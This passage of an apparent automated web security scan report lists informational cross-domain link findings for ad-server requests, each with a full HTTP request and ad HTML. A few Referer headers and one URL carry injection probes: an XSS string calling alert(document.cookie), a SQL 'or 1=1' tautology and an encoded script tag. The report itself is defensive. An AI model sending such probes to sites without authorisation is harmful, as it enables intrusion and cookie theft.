<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
9894955/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/1-Womens_Rollback_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.19. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4441.microsoftonline/B5073082

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:55:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 646

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/c0/%2a/p;234084859;2-0;0;57336107;4307-300/250;39942938/39960725/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.prioritymail.com/msnbc2"><img src="http://s0.2mdn.net/viewad/1381014/2-usps10_seqmes1_triala_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

22.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6566
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:51:15 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:49:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6443

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Dec 17 12:45:48 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/x%3B234265784%3B0-0%3B0%3B58044025%3B4307-300/250%3B39750646/39768433/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU"><img src="http://s0.2mdn.net/2530996/2-Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6566
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:02 GMT
Expires: Sun, 30 Jan 2011 19:26:02 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 16:06:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6567

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:54:29 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/c0/%2a/y%3B234266103%3B0-0%3B0%3B58044025%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:54:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6573

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Dec 17 12:41:00 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/n%3B234280362%3B1-0%3B0%3B58044029%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs%3D%3fhttp://activetrader.schwab.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/freetrial.aspx[QM]offer=PLU"><img src="http://s0.2mdn.net/2530996/1-Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 720
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:04 GMT
Expires: Sun, 30 Jan 2011 19:26:04 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bd/%2a/l;234282361;3-0;0;58044029;4307-300/250;38567024/38584781/1;;~sscs=%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/offer/jump/OptionsResources/intermediate.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/viewad/2530996/Schwab_AI_Q410_Randy-ArticleC_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6554
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:51:15 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bd/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"><img src="http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.27. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/tigerdirect.com/Section_2_House

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 448
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 15:14:42 GMT
Expires: Sun, 30 Jan 2011 15:14:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/0/0/%2a/m;203131985;0-0;0;27095315;27966-977/40;37635588/37653466/2;;~sscs=%3fhttp://www.facebook.com/TigerDirect"><img src="http://s0.2mdn.net/viewad/1308101/FB_977x40-fblike.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.28. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2465.SD137929N2465SN0/B4809700.27

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 17:16:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 518

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/14/c5/%2a/e;232804175;0-0;0;56866311;21-88/31;38302341/38320098/1;;~sscs=%3fhttp://oasc03049.popsci.com/RealMedia/ads
...[SNIP]...
i.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?http://www.autozone.com/autozone/storelocator/storeLocatorMain.jsp"><img src="http://s0.2mdn.net/viewad/1104996/5-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.29. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2465.SD137929N2465SN0/B4809700.8

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 17:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/14/c7/%2a/r;232804175;0-0;0;56682324;21-88/31;38302341/38320098/1;;~sscs=%3fhttp://oasc03049.popsci.com/RealMedia/ads
...[SNIP]...
com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?http://www.autozone.com/autozone/storelocator/storeLocatorMain.jsp"><img src="http://s0.2mdn.net/viewad/1104996/5-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 569

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=9903600230&utm_medium=banner&utm_campaign=nyp"><img src="http://s0.2mdn.net/viewad/1384245/300x60+MSN+Slider+Banner.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.31. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
